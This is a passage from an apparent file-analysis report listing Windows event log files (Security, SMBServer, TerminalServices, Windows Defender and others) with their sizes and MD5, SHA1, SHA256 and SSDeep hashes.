SHA1: 488f95de90ceff8879a4f57f585e3232c9e01fb3 SHA256: 5bdd9cddb737667e822914275e0bc81b74209fd27494e2a7ab2f21bb28bb1b34 SSDeep: 24576:wnmTyoCmKbGRIW7nOj7x6wJ4kX7VeUJXHuXWJysWX66Ov/:wnmy5HZWo9zGkxFJ0WJBWTOn |
|
|
| \Logs\Setup.evtx | 68.39 KB |
MD5:
fb00ae2eaa72b586bb9e8df07014ae4c
SHA1: 3af4c6905be0ff5570a474596902bbfc3ab62bba SHA256: e749a1c3345d777550f67b057600f53411784a284e3b562d3b8bb69dc4466d61 SSDeep: 1536:N7SydM4LRxNx+/eA3268M2F/Y221DTYMbKTjux4OwoAVE6/Hd3:ZSydNLR4/p38M2F/YNHJKTf1VESN |
|
|
| \Logs\Security.evtx | 1.07 MB |
MD5:
879cc00405500419e9e272d8639f8505
SHA1: 0c6f835a994c0dcf67c7ee14f649d6c3a489f2a5 SHA256: e7b102f75a19ef96c51dc208b79900c0bfdd8467022cf7fca21411ad36614cdd SSDeep: 24576:2shSSeBuIEc8eu+zcnucDbExAmwXuhG3/26MsbyjX7Ko9qfpR+hih4gsQdf:2sTLeu4HcDeU326xbItAqih4wf |
|
|
| \Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx | 1.00 MB |
MD5:
15bb5c0aa398facb32222621c40a849b
SHA1: 3d657eda0aa2d2780d9be3e58c5a54b0d994fe58 SHA256: 8dbae2dc98e62ad6edc0439de58a1d41379baba3ce6cdce13a4f0fdd1fd783ef SSDeep: 24576:z0/mogpYVk5k/Wo0oD7sdkSlGle72VzAx22SXb8MEFduAdY4q1c6yQxw:gmoKYae7sdxGc74zAx2yWcY4kw |
|
|
| \Logs\Microsoft-Windows-Winlogon%4Operational.evtx | 68.39 KB |
MD5:
dadbddabf1d00edc559656f4dd409f86
SHA1: 93d9945c81b6c44a790f8a387988bb5e3ab4e7de SHA256: 32b9b3b917fa88bb77a8d39c98485b07076165530d3d70d61e80ad8d807c9269 SSDeep: 1536:d0Ezt7BdYuNVq4Msv+KTXW/hDwQ8m3cFC5wX4H1OpEPUBksfEyjtV:d0qdPg4Me+KTIhh8dFCWX4HlIffXtV |
|
|
| \Logs\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx | 68.39 KB |
MD5:
c73afff583fa27abe65d97746b92b71f
SHA1: 0ec8570934c01c8aab8ccec54aa77b3e61a81e56 SHA256: 84a6907af8198af71cc4c9355fc3d20ff2dbff7933b3566cb4d98d052622b8c8 SSDeep: 1536:HEOJtBNydNyYcu1JH11xor6woDdvvNpkuusQe8N:xtBNyfyZ2foVoRn8uujN |
|
|
| \Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx | 1.00 MB |
MD5:
cba8876af2506c22790c31e8ac479939
SHA1: 3822b6941e9eec866355af75e7f843e2adccd993 SHA256: 84bcee26d1e3a7f22b9f5c6be4ac5d594a4b5709b7264528b2f7bdec6531cfb1 SSDeep: 24576:zqqRNH1Lgc5J+VqXFjGJc0pkcHyw8z/K6ORjPaWav:zq8H1kc5IVqZwc6Swoy6ORjP5av |
|
|
| \Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx | 68.39 KB |
MD5:
345bc4e54128319e0b7a3ccdf57ec926
SHA1: 146cc9b8a35c28231c07f7e0dc22fe14eb5589ee SHA256: 8cb03ceac54136a1eb47e7101a22267f9988f631cd1e827144dfdaf3c701dc92 SSDeep: 1536:VPk15NstnEB9tNEP6WH6/FiRhvlYlKwCitm4xKVnUcBj:VPcbstEBFEPtHymlYlzBrcR |
|
|
| \Logs\Microsoft-Windows-Windows Defender%4WHC.evtx | 68.39 KB |
MD5:
3737b9605ad7e6ac8db7656f6fda5f14
SHA1: 5799c7ff67572ef17e8b0ab30faed7129edf154b SHA256: cc81e0fb3c87ac2ef9b88cb747452b8937d66737c7c5aad22bfcde2ef3c62feb SSDeep: 1536:cz/Wmnxzvb9t2uKhiFxtf3digb6kbAQ+sF0dTevTEi/BCU:cbWmxzDzUMXtf3Yg3kCF0QvIMBR |
|
|
| \Logs\Microsoft-Windows-Windows Defender%4Operational.evtx | 68.39 KB |
MD5:
75d4c9426c3d8f2a7f1c3a80317afe91
SHA1: e2b319a8c29fd7f8e9aa700691d591a60eefd5b2 SHA256: efcff0c9a83caa747d859b1329c7207371838ed706e55050551a634e608b5d93 SSDeep: 1536:XLST/MO6qcC0VnDiGvUH39lViepDG3ZTt2NW:XLSTiqF8rvUHtl/6ic |
|
|
| \Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx | 68.39 KB |
MD5:
a6a1fbe565e35855a7302c54f3678c83
SHA1: 150785195190a6647c1811d8394c1af028a8b43e SHA256: 6e41eeff085c7db98bd4a71808a9ee5a5a2dcd5b6257e07cd886e0600f34cec1 SSDeep: 1536:LDn2aT4fgasVtGPcTJnj8aQRpR72qiGIkAsZ16t900R4UP4J:LD7kgasVtGPGn8RT72qisx16T0G4mS |
|
|
| \Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx | 68.39 KB |
MD5:
dee79b33dd56130a2cb733c2d187bc97
SHA1: d85b85fdb4b1f05e175500f97ecdc8ed6f7de197 SHA256: 189b6ffd695f1a1d66b6442785899ee9928f1eb8212b3e6769ebba3a9dec6102 SSDeep: 1536:iIt/Mo8CJ1+Y7T/loMU762j/1BLTf9pgCu0TdeDryQP1:7/Mo8I+Y7ce2j3TgnHz1 |
|
|
| \Logs\Microsoft-Windows-UserPnp%4DeviceInstall.evtx | 68.39 KB |
MD5:
12b90763255471ac98c9f92ae5d07ba8
SHA1: 97ae9642777e0930f855e0a5f75c08ca1cc555b0 SHA256: 21c6b8bef9dce5c2f1a3e770df42937d2e464bba41274783ad3a1b6f6b1cb34f SSDeep: 1536:uDZmnuM3LkvVTtT2REU/KcSL4D5TD31eBM5pghHjMJy43q:uDgnt3LktTtT2RECKcA4D5vsBM5pgljl |
|
|
| \Logs\Microsoft-Windows-UserPnp%4ActionCenter.evtx | 68.39 KB |
MD5:
4a65b83b88b6e72d77cc7eaed0245d1f
SHA1: 4385316045abacd789e8eddc1a89ed4cf7784105 SHA256: b05da7ef2c8bc9162c35f954ad82ed5e65cec42c1cf6a0133297cfd774dc50b4 SSDeep: 1536:hSYGYos8lgsyDBM9TOuQg+h9b2ypBLpwGR2SNkblt3:P7dsyDuyphN2wpVNkbX3 |
|
|
| \Logs\Microsoft-Windows-User Profile Service%4Operational.evtx | 68.39 KB |
MD5:
0b08a506c5f18cc890b8cd84df988602
SHA1: f1856d6d4cab701cd9f05873f2d8fc159e7168b4 SHA256: b38eb160998a0e16a675fc07654577192f4cdb5ce9eabfc4385292deb49ef77c SSDeep: 1536:XzbREcEFivP3EhtO6v+a+2gfTubun+xOZ4T792Lpa0baUr8HsU:XhEZY38g4NMrubu+78Lpa0mUr8J |
|
|
| \Logs\Microsoft-Windows-TWinUI%4Operational.evtx | 68.39 KB |
MD5:
7b1b2a5a2954762729716d1a8e90482f
SHA1: 64ae464b095534001092f5e758cfc92abd84a337 SHA256: f5e6c15d053e75ab34861a7d300e3a3ce20ba91e303b9cb1e7b08e0718f7c1b3 SSDeep: 1536:F47BuWEdeciqSW1IgeIoJvpcDb1A5lNmlvpwqEJg/9vZ3OESu9XEB:F47c9dZJSkIgeBJ+JA5HmlvKJhMM |
|
|
| \Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx | 68.39 KB |
MD5:
626528a50e60c70ba9ed3b313ee93eb0
SHA1: d254743bce293ed73af11c5a6415c07167af8a91 SHA256: 2bee15ff5b5e13cdffb4edcc81989b43fcc5cf765483987e86f05b2c6777dbee SSDeep: 1536:9g6P6odS312YCGZQiUkdQ1wVGNSDQ0paTDnM6afpQ:26io+p5Ttd9UBbrD |
|
|
| \Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx | 68.39 KB |
MD5:
c7990c9c80077191505372f960d93717
SHA1: 1a91979c2ff7c72cfa26b4496a9bb14bc3f5f8b6 SHA256: 15086351fc2bded618bb049681b0d706f5fb16a3ea4ed3a5db86405996a1872a SSDeep: 1536:JH+7UoA8ghwAsrUUYkUPpO16p0ebkCgmQretWX1dK4tftd:A7g3hwlrUULN6pHbkCg6t2/K45td |
|
|
| \Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx | 68.39 KB |
MD5:
8cca99cf58da4bc531d35f5305e893a7
SHA1: f734aeaf41307489e07b68bc67b852437293fed4 SHA256: 009cbd85e6fa568687d9ae059c3b571ed338fd7a72585bbe6cb88be94452485c SSDeep: 1536:QAdYiJmToiTaJaK0v0ETSBvzGNfMEkj4Z2lIaf/BIVB:QAd/Jm/ZK0v0ETSvzTrjaJX |
|
|
| \Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx | 68.39 KB |
MD5:
30795dd7de54d07f44dcd67b15a53d37
SHA1: a74937180418e650e4ff0af400d08fc237bdfc07 SHA256: 6a2a586092526a1cf5f21114b3c12ad548e768cc044e88c21f73a684c9909560 SSDeep: 1536:wmkT30dGZRFuKpb89JvhFPrI/9Ig4Ho5pbhO8uhX6g:CzZRFuOb8dFU/9IgUonhO86X6g |
|
|
| \Logs\Microsoft-Windows-TaskScheduler%4Maintenance.evtx | 68.39 KB |
MD5:
f4514442ccbe425198a43629636cbfe5
SHA1: 99c31ba2418b09272f481f4312cb9e12aa9d34c9 SHA256: c7f75b471acd58308742031c4fa7e909e1e37ef6d07d31c31d77c5625e94209e SSDeep: 1536:L33KvjG/8CehDxsnUpEpQYLt+WXIrPy1a8+9jjeOasa4SN:L36vqreh1zqVNYrPwa8eeOasc |
|
|
| \Logs\Microsoft-Windows-Store%4Operational.evtx | 68.39 KB |
MD5:
da50e2ea706b9a0f4ae25d277b448511
SHA1: 9f0b336bfc722e6bca0c8b81c526c5aa60cd0c05 SHA256: cba96cb4bba76f414608356b39f243427bf59289e428c549d5fd6378a82f2fdb SSDeep: 1536:HRWqEkpzYIMKQ/jpiTOnKHbVbzNPc2TVgYK8J:HRWf5TNolNPcMVg0J |
|
|
| \Logs\Microsoft-Windows-SMBServer%4Security.evtx | 68.39 KB |
MD5:
048eebc2c549fbb0c32586206505a33e
SHA1: 7417ab51eb500c783191f2bc0de7e8e50f19f1d6 SHA256: 3ed2e147dbc167ac75e4b2aab4927f3598f294f846e4f71f0e907cb201fba344 SSDeep: 1536:YUu6MJBeDzp7LrN6eHhpJlgTDrUJ9Opx0fITkrmdI9g:Y16ySRXseHh7lI/Ayug7Ii |
|
|
| \Logs\Microsoft-Windows-SMBServer%4Operational.evtx | 68.39 KB |
MD5:
a2c4edbb6f765a068b0659274faaf8ce
SHA1: a2ffebdaeb966f82253063d0bd62b0a3d4234f2b SHA256: 7fba066c5d0fa791c24e52ae870abe1e0e9b8b12455291e6897426e6153a8019 SSDeep: 1536:VErNzuc1HjOAswJ++TCyDOvS556lyuGNfrhJ3eYYPnRp5:VErNzuc1K+HDOaalGNjhJOYch |
|
|
| \Logs\Microsoft-Windows-SMBServer%4Connectivity.evtx | 68.39 KB |
MD5:
cb2d1c16270a67e3386281dd1e1d7919
SHA1: 6fb7b9f8a50002fd3f3916bb8dca5f07dd5127db SHA256: f6c5fe18784aeac4705e81b1c26a1ba6ab524b363e0018d1a237b854f46fcf4b SSDeep: 1536:WMH9le1RFBNR7r1zSq9JcrGBfTFFjQ48ztVwhWk4I+d:lH9oBzScKrGphahVwhXEd |
|
|
| \Logs\Microsoft-Windows-SMBServer%4Audit.evtx | 68.39 KB |
MD5:
f7f9c192da2087f0ef71774a19a3e0e7
SHA1: 001b0795ead5971eb79a43b31c9d70df882fdc50 SHA256: 77aa88d531fc1f4b6077ef23139a69314d8ba4f7a3ecb852647bb0cb78822e9c SSDeep: 1536:fzI+jzJrGwaBx2HR3up4h+kvI/ufNYcLcBJnphKfeJ8X:fzqwixK33hi/uX2ceJ8X |
|
|
| \Logs\Microsoft-Windows-SmbClient%4Security.evtx | 68.39 KB |
MD5:
6b0db43b638817a58d7858fac97a070d
SHA1: 4cab8b0b78addb2f2f4e84c137a21742ba7a4b41 SHA256: 7981497767e01aa5a44ece91beeef339c4e83a40aeb49f72b408cdc12e8a4c2b SSDeep: 1536:0iwMvKxloX8U+uKXhrkufyZiWciSZYrSlfEQmi+4PLYopESo/p/Pjc:ExKH+uKXuumi5iPrSJEQj5jYopzoh/PI |
|
|
| \Logs\Microsoft-Windows-SMBClient%4Operational.evtx | 68.39 KB |
MD5:
cef348ce74af2dbe3fa704cd0ca3d326
SHA1: e8322e875353b47dc6ec301f9bdea92eb84515cf SHA256: 5e43ed9b12ab5b3fe663109e9dfb936ddf033bf60c685379bd5d74e77bda931d SSDeep: 1536:jHgdk2vt6HPlPG8O7EtA8OnckYXn4rfPC5poqC2s5cczqtW5c6ug:jAdk216Hdu8Q6BXJnoJKcpqe |
|
|
| \Logs\Microsoft-Windows-Shell-Core%4Operational.evtx | 68.39 KB |
MD5:
5e25b23461b85e84cfaa1406c145e62d
SHA1: 1d33cd6bacef744fd1a1f5aa9d8d839952993a07 SHA256: cbba1b6801bfd8a265510586ab2117fa166c1c47993f8f5f1af037d5a9b0dc0a SSDeep: 1536:EB9tJTooUySlds8bYWAKoiQq/QZ9Y94Y75yJ0e8R3jmWgsvq:EB9uFlu8YwQJZG7EJ0r5jzq |
|
|
| \Logs\Microsoft-Windows-SettingSync%4Operational.evtx | 68.39 KB |
MD5:
82e332712e87f7ee45c56f000e15f1a4
SHA1: 2cd1ca76691d1b9f2dc0e340dde5427f3a412009 SHA256: b4f6b0bdb9c6793c8ea4824af807202085a23519f5357c1aa828560de09c10ba SSDeep: 1536:mp83+cLkJ0fh4y6t7ZiwlMAnYLwkC4zniSGAO/SXotGZMFYBKQuqeNn1:mSOwO0fWyS7ZiI6Lwk3niSG5/8Z8qeN1 |
|
|
| \Logs\Microsoft-Windows-SettingSync%4Debug.evtx | 1.00 MB |
MD5:
b3d0c9c31787ff9d3744ae2e151b7b90
SHA1: 924e47141129efc8ede0ebff3eea78cef0106f7d SHA256: 59fc3b7cabb00491ca6551746e667d53e0eafbfaa22ae0660a40bbe85cba8dd7 SSDeep: 24576:h5TXL90gB97bLRpxKRQBJiZqI1RJ8ixrLUtSSJ/abBWl:/90gB975pxSWiZqIRjEJ/ic |
|
|
| \Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx | 68.39 KB |
MD5:
e88ede4bdd160bc2f8f17ad14968968d
SHA1: 023da283d1c5c4bb8e9f47da9bd47b9ba3e42bde SHA256: f8f5f5eb18945a007932913289635b3cb65e6e1cbcb520ba8c15837601b40918 SSDeep: 1536:X7rfUFLjTqGE8Xp7mbbSxkb+SAmht4Z5Y1UZT:X7rWOGE8XpQ6SAmh454CT |
|
|
| \Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx | 68.39 KB |
MD5:
86849ae19b298f8e4da0a490a5097032
SHA1: f650c27986b8af891a6cce38297dcbda4b6f4409 SHA256: 4433f9419ab80b817e91c8cc0641814ba8a93b4a86eb030259d2a89ba2bc7101 SSDeep: 1536:3bHhC4FxA1QEiJB+EgXq4IIGZCO6+fA9MyTLp:rhCsA14fHXIr+PyTF |
|
|
| \Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx | 68.39 KB |
MD5:
1b185424dbece6b6109f581b1d400e18
SHA1: 6901918d335f6a99231194c9dcfd70d61c1514b1 SHA256: f435f6f2c77f14ae9194b012acf14258c6eaf3626ec7ff4a9ff1ee9be5a0b46b SSDeep: 1536:YdFQFmjzhAw+kkyYjXiL5ThkWfkpsDU7DrZ1sEiENqIBU98d:Y/Qi+kkyY7iLd3asDU7/LNiEIJ98d |
|
|
| \Logs\Microsoft-Windows-Ntfs%4WHC.evtx | 68.39 KB |
MD5:
55841b1e83d72dc9507e6293c6f0ebc8
SHA1: 1d9d436716423e38b186f4e9d2905eaee8df3e0c SHA256: 27f965d51e62eeeef22bb0c9c3c0fbcbfa22a2d6bf550976f777b93757c8800a SSDeep: 1536:XUnilPQSh2CIjnNP2dAh+O49WZpB3EyB/jknN3QiKny:EynIbodAsO4EZj3EycBGy |
|
|
| \Logs\Microsoft-Windows-Ntfs%4Operational.evtx | 68.39 KB |
MD5:
418a503b59e3269b56fe6114997fce91
SHA1: 73aa16fbee2a1d8586bf9a52ac03133d6ed80beb SHA256: 1f9489bb49ee856e79fcf3c6d5e5f0b7e154296375a782969d00434e2560e41d SSDeep: 1536:5iUcGpOxJtfUMUi3XlNaZL7ypvzECfaBO9SMjpshg:5Syml4FOVhlug |
|
|
| \Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx | 68.39 KB |
MD5:
5cb774c9e3eddb6f501cf454ff7b4fe4
SHA1: 1c513cd0e9403252c677407c938cc1577f2b6c12 SHA256: 50dd3c52069594b4ab72692ca888103b05a5f190251876065cdcdba3239d1276 SSDeep: 1536:L68ReUNlHyb4zz69Vfs7aUY6KwyAF+1nlz7AJqkyZ/S4j7z6Bw:L3eU3DucK+F+N4mYiz4w |
|
|
| \Logs\Microsoft-Windows-MUI%4Admin.evtx | 68.39 KB |
MD5:
09e2b69c128a2e774edf0671a317c948
SHA1: 15f278c2c5cd83fdff808da555216f44e4b27f15 SHA256: bb229cc35a5711400b83d62adb681e5410baea20a12f7b3280e65aa324469de9 SSDeep: 1536:I8Dqp/Lmkl6C+yukjiq+eh9/R85ogRc9zLBZs31F8iKQvv:I8Op9zQYF7fzObH |
|
|
| \Logs\Microsoft-Windows-LiveId%4Operational.evtx | 68.39 KB |
MD5:
4be74f950870f87c20cf9a9e302a658d
SHA1: 2e1d54cccf56a2317965877e6f7d87db75e00b3b SHA256: d10303f11f0e7ae960405d924b09c6286486d88652a6e625b27bd8cfd0d7b0c4 SSDeep: 1536:U1VG0CeyBEZj2tiTZ6xw0mqJvZZbeYMfFrq1ctdWf938B:AVGj/Lwg1z6YMde1YWf0 |
|
|
| \Logs\Microsoft-Windows-Known Folders API Service.evtx | 68.39 KB |
MD5:
474f977b4d6d7b5fbfd14683f55dbd1b
SHA1: 021dc135f69dad1f8998d6ee14b9522a108706e9 SHA256: b8c16cb0f14de4bc7cf1b47c81cedf114a239fe6769e31a2aa2789c3b84e70ac SSDeep: 1536:s8VBlviHHDZQVJB3dx90bbjE9//phm46+n:XBmHWTBmbvEVphm+n |
|
|
| \Logs\Microsoft-Windows-Kernel-WHEA%4Errors.evtx | 68.39 KB |
MD5:
2b3e113e176358112fbb9d54ed2f1a08
SHA1: 62e35a3b0084bcb57979866d04c1fa17b324437a SHA256: 9024dd15db4ac8f15ba2fb48c67425ab80e7f80797d1746d75f4633303303b22 SSDeep: 1536:qtT46I4zbNiAlEwosPoJcMI5OPJ0WJlt/XNYF5Cwom:eRbNiMx7QiMINWJlt/Kom |
|
|
| \Logs\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx | 68.39 KB |
MD5:
d3b4228fbc9c19a40edbe502d3e7f705
SHA1: b3caedff18714d7958d0a0168db72ad94cce573e SHA256: cb44940881a7ac60b50ad3015b42a178bc672f0e886679f32ae91adc8b951985 SSDeep: 1536:LdRRCdHG9yyo25nI1PUzgqrlm9qXG81n3rffVRqRpYkxDImdoQvO:L/Oi35I1skqhVX53rf8YkhImuMO |
|
|
| \Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx | 68.39 KB |
MD5:
9aa495a9ad38bec00e1660eb457069a1
SHA1: d015ca03a747c59c7e69bb6ce1f86e1e88ee78fb SHA256: 013061d1dad53f8f645499fe02af8a92fce50ce0c8dd3010ef6ccab8f6aebee5 SSDeep: 1536:27A+gtvr6ttrbk9bMKhOFqi88VUCQaKv0E+USHH3yNYLRcMXdi3b:DQttrb2XiD2ae+UUJnt0b |
|
|
| \Logs\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx | 68.39 KB |
MD5:
e4c7ea7e292a1a83591af30791ffe4dd
SHA1: c637d512c401a744d35a2a795487d55c40595149 SHA256: 6fe9fc258b69d6743237f2a78ffe71450b7be5255706074fcc48b036ed935e6f SSDeep: 1536:jWBDvRfn0yt0lGYg239r/sVgM3UDaRaa4sLzNPFQSq5yfxF54vXcE5uFE6Bc:qBD1nxWlrgAmVHUuRaaTHNSSCUD4vXPV |
|
|
| \Logs\Microsoft-Windows-Kernel-PnP%4Configuration.evtx | 1.00 MB |
MD5:
62aa00136821980928aa95aba869c7fa
SHA1: 51f087763ed4436317b317865c8ddcfd8cd26b7b SHA256: 6e55fbfa7e31641772629801ffe3aa65f1e196ca347187609b1f729737db5533 SSDeep: 24576:cDDQu9w4c/rGMHSjsXvQfHRBE/7gDKKgwCLa65y:+Dt9K/DHSQXvu2/aKKt |
|
|
| \Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx | 68.39 KB |
MD5:
9b02046f86ec3ef6f545c2af138a1a08
SHA1: 483dba290c4e3813afd234110ce259f1a6ead6d9 SHA256: 4c096e51631ae6a14468fb5750f6b84c87ae5691d1adb2163056700b675cc6f4 SSDeep: 1536:CcBmc7P7UR/b22KY+XqTWLi5xNWTg8ug/N7MZr839EJEOWR:3HvH2ng0W4D9gV7MZrnJEXR |
|
|
| \Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx | 68.39 KB |
MD5:
033c1012b0eae3f093a2cc8efdfbdbf4
SHA1: 2fa30b0717e5baef12901c6d679e1ae94bbf6be6 SHA256: 5c65fc96da2e859ef7c7e82dfabb3e39deb982adf00b1d90b7ae8c9b95c5317e SSDeep: 1536:5+LYx78EUZ97MlrPxWDMMkfOkILuEiqZ/OyHtmSL:5+LYx7nUZNMlrPxkNkxxa/OyN3 |
|
|
| \Logs\Microsoft-Windows-International%4Operational.evtx | 68.39 KB |
MD5:
ee89597b33323f529707a014f7515199
SHA1: 417c3f70629d4987cf41e3ea1ba8200d5fb7ebea SHA256: f09a6e755908af27be32d42b1ad2ad66a47cb1d9ca6684febafaedf9e1ce303a SSDeep: 1536:MAUmrIArwHWVDPrHxK3UQ8uH+LJGiG3KEUoa0kjcLlr4:MAUm8O9xK3ZDIMOGLO |
|
|
| \Logs\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx | 68.39 KB |
MD5:
18bb8eb911cef2e13119a7b0e3aab5e8
SHA1: 90dcf858339c15c27cade684ca7791dccfc02f6b SHA256: ba2e48dff1847cea5d8367a727c5ddadd96363351b4228b86e5fd7fc14c4743c SSDeep: 1536:1Om5HF1CTo/ot8yvCL+9ohW3C++DyJnMoCLFmLZgLMH9PwrDk:1OeZ/A8yvCa9oEt+DyJ/bLZ+u9P |
|
|
| \Logs\Microsoft-Windows-HotspotAuth%4Operational.evtx | 68.39 KB |
MD5:
a136168c9b3c1748f2e123b9e6c7819a
SHA1: a79c0c49bae40d1904fd5f1889dda30e358e0f42 SHA256: c6cb3d7dcb4e8e0508301c04d31e5411c8a63dec12e580bf86d899a7565f74c6 SSDeep: 1536:sd7rBI9Qpcpi80QYYW5iwtBcEejfUuXujueL6Eunl:OFIiipipODwfcVjfUNjuY6EO |
|
|
| \Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx | 68.39 KB |
MD5:
70ad9bf59e23282da9374a6b42191d22
SHA1: 56538e5600b5c4cc677855548f63b4026fca8128 SHA256: 19870cb313c487f26cb99905b8503ced8184fe9bf5ce7bbf0c6b7acef72dfb8c SSDeep: 1536:6JrRWi+RZyyH1nDiTNr8rkxo/vTXfTMM1RNGzNxr2dE9HVgQ:kW/RZyUDCr8rkWTXfPFFdE91b |
|
|
| \Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx | 68.39 KB |
MD5:
b9325e1a165ba6e60fef73a8c2b2d5cb
SHA1: d7d7f24f0de4ab1e10a996b11d36fc17be67e113 SHA256: 990a003cb494ef566f150242eee2545fa3bdc3af9af9e6cb4771fc925f4f0b79 SSDeep: 1536:esU8WDj4ZPY0NCH16yFt699WhXDLXlR5SlNL4OpcpnPOyR2GEE:/ULjD0NfyFF55SkBPB3F |
|
|
| \Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx | 68.39 KB |
MD5:
e09ec219b67d8bcf0e2b484902f3e54a
SHA1: 70d9ea2f6e32d987ba2a0fc8551f5a90dba7b56d SHA256: d0d775d661a5bd49990e4b6e8e0f45e57f6db2d3c1ebdd9ddb4d524ed9924ac9 SSDeep: 1536:JjNnjzVNxloa9XmTXFWPBfVrJqPxs2hQbZZ8Z+gouUorgxI:JjNnj9R92XFAlVKO2hQbZZ6ouUorYI |
|
|
| \Logs\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx | 68.39 KB |
MD5:
2865e0e3373c6280126309c78fc96394
SHA1: 1ac62a908f362564e5402cf7ea86f9bc4ad44d0e SHA256: 2b2be2ef1d7a5c1b1705aec2b853337244429334a6f108aec2427b3a68b7e300 SSDeep: 1536:mHz9ZHYHTiaE2ULubirqzLRxXF/MRLgKiKGRn77VfzLINsA:+z9Z4H8uLzL1/MRMyGR77Vfzg |
|
|
| \Logs\Microsoft-Windows-Dhcp-Client%4Admin.evtx | 68.39 KB |
MD5:
369476683b8cc624a5fb43eed3cc6d29
SHA1: f9e05a7071dbd7e44fc324878331eac47ece8f73 SHA256: e6d68f15070c54d8a84e2577816dff41d882f53ac81c481982d06457008dbbeb SSDeep: 1536:WCXBdZ8yLWIPs6jhKXaNWfN84ScY1OEMq8gfD:WgBdZ8yLWAUF5SfO5UD |
|
|
| \Logs\Microsoft-Windows-DeviceSetupManager%4Operational.evtx | 68.39 KB |
MD5:
151c229029507e070b41bafa842ac99a
SHA1: 9a868df1d859c9307e088089ac3d06abb8b9318d SHA256: a101ac202ab2e8fa9fa2405e122f7079305fc1e632f70ff7403617885bc51c9c SSDeep: 1536:YO0G5haFJhOclPONWxxdktyEPz990CLIoiTvdgW/qf9QHKxm:YOL632HvPY9DdgtfaHim |
|
|
| \Logs\Microsoft-Windows-DeviceSetupManager%4Admin.evtx | 68.39 KB |
MD5:
33bd6512e196852f44a4bd94befe1d60
SHA1: 46d47edf9314c7a4e12b1f35175a7fc521346e0e SHA256: 51202798e533c63c2a4f148f42fb41719251d66ddf7587c2c0193a8cfa531e07 SSDeep: 1536:9d1Zqr0XNKms6PoO+Mm+QXd33u3L3Xg+MKSR8r:9x0PpO+Mfke3LMKxr |
|
|
| \Logs\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx | 1.00 MB |
MD5:
fa5b02203a8acdd02ef6e95cc81ed68c
SHA1: c6c1a1694ed318b861e0faadc673db6c3805d48f SHA256: cb73843eee018e025bc83a0bd9f616c6c29626b6a387cda06852bc355fe301c6 SSDeep: 24576:KgOnoaXgoO/u6fCl/d9qfUbVf73oNkG1Hud1nFBJgK1ZT4:rKoaXfOG5l/zVfjoNkwGFvgKQ |
|
|
| \Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx | 68.39 KB |
MD5:
882f4d1ccc5d60e29f93ba9b493ae461
SHA1: 261d872db930e8e3d267a0303f11e2138ec7fe10 SHA256: 6c32ea02b45bf7f69f6d00a5f8fa639aaad40a15ee85a1122a85723d67b9b575 SSDeep: 1536:TnvlIh+XebLKROa2Isu6A8cRxpyb+Io3SJoaieW4MYCVNymGkL:TvOwXXNVySIo3SJoMGl6kL |
|
|
| \Logs\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx | 68.39 KB |
MD5:
af29f2156fc8c52099741fd9a6579679
SHA1: 1b5f0030c6334f998db7f4f79e82d897876ba1be SHA256: c4ce2c18bf7cc88cc375f75d9bef3881b0b2e7ed4cd1b755b3a40f531f2d1652 SSDeep: 768:46oDAos9ycQQ0YN7T1zzBwjaQu0pYucdkvobuoLUZxY9dECEECab7JqL8tpsUfsb:SAos9yLQN/l2e+pszBUZxa70o9vWfhbh |
|
|
| \Logs\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx | 68.39 KB |
MD5:
b5b1dc87c143cce5367061442168b46b
SHA1: 47d32ea246c6148f684db424d37ca4dbdcd8ca36 SHA256: ad69edaaee461ece4ea4611072ecbe0068de21064411aa4834a5758f4afcfb0f SSDeep: 1536:kwdPeUbM28AT34Anq6A26FpwLqwEHklHuEfahjq1LtS:TFe6T34L26FZrFhu1BS |
|
|
| \Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx | 68.39 KB |
MD5:
ba2b9b1d6e37b158f4c9dabd2f0408fd
SHA1: 2e59685a5499f5dec2943530cdc02bb3272f0942 SHA256: 2fe1d8d1f684fa57ca52f10a18741aaa9b3670034283e3c3b756a0b08b80c96f SSDeep: 1536:6w/8NapZJOPSwfetga/plg6/bwzQTSTYexngaJyEJa+AK2oj:OapPOPv6czISsexngGyD+Aboj |
|
|
| \Logs\Microsoft-Windows-Bits-Client%4Operational.evtx | 68.39 KB |
MD5:
62dbaa9f92799b39d606dcc9c7ecc91c
SHA1: 07c79a5f880567b34f82e95f1145f23604c83bab SHA256: 907e8667ce7cd8c5e2502202f97b880462c2b429417dd8d8f3640792e64d488a SSDeep: 1536:isPNQTZ1IgtaazktiF+ng66xXHaxL9l0d/IGt4Cp8/5ZCDRltpcvNU4:zPNsZJta1tiwg6w3aeQGt4H5ZCfQvNU4 |
|
|
| \Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx | 68.39 KB |
MD5:
6c1609db6d1f15a282b862a92921ca31
